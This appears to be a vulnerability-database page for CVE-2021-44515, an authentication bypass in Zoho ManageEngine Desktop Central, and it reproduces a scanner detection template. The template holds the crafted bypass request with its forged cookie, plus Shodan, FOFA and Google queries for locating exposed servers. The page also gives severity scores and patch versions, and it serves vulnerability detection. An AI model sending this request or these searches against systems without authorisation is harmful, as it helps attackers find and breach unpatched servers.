10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.974 High
EPSS
Percentile
99.9%
Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
id: CVE-2021-44515
info:
name: Zoho ManageEngine Desktop Central - Remote Code Execution
author: Adam Crosser
severity: critical
description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
reference:
- https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
- https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
epss-score: 0.97233
epss-percentile: 0.99811
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 1
vendor: zohocorp
product: manageengine_desktop_central
shodan-query: http.title:"manageengine desktop central 10"
fofa-query:
- title="manageengine desktop central 10"
- app="zoho-manageengine-desktop"
google-query: intitle:"manageengine desktop central 10"
tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp
http:
- raw:
- |
GET /STATE_ID/123/agentLogUploader HTTP/1.1
Host: {{Hostname}}
Cookie: STATE_COOKIE=&_REQS/_TIME/123
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body) == 0"
- type: word
part: header
words:
- "UEMJSESSIONID="
- type: status
status:
- 200
# digest: 490a0046304402204e74c9d1f872acadab6809554240d33d2c3a6a705337456e69661b6c4269fc3102201e4fa02653abb82c07fca7c5bfc73a5150cc4431d900a7da941012f48ae57e2e:922c64590222798bb761d5b6d8e72950
attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
nvd.nist.gov/vuln/detail/CVE-2021-44515
pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.974 High
EPSS
Percentile
99.9%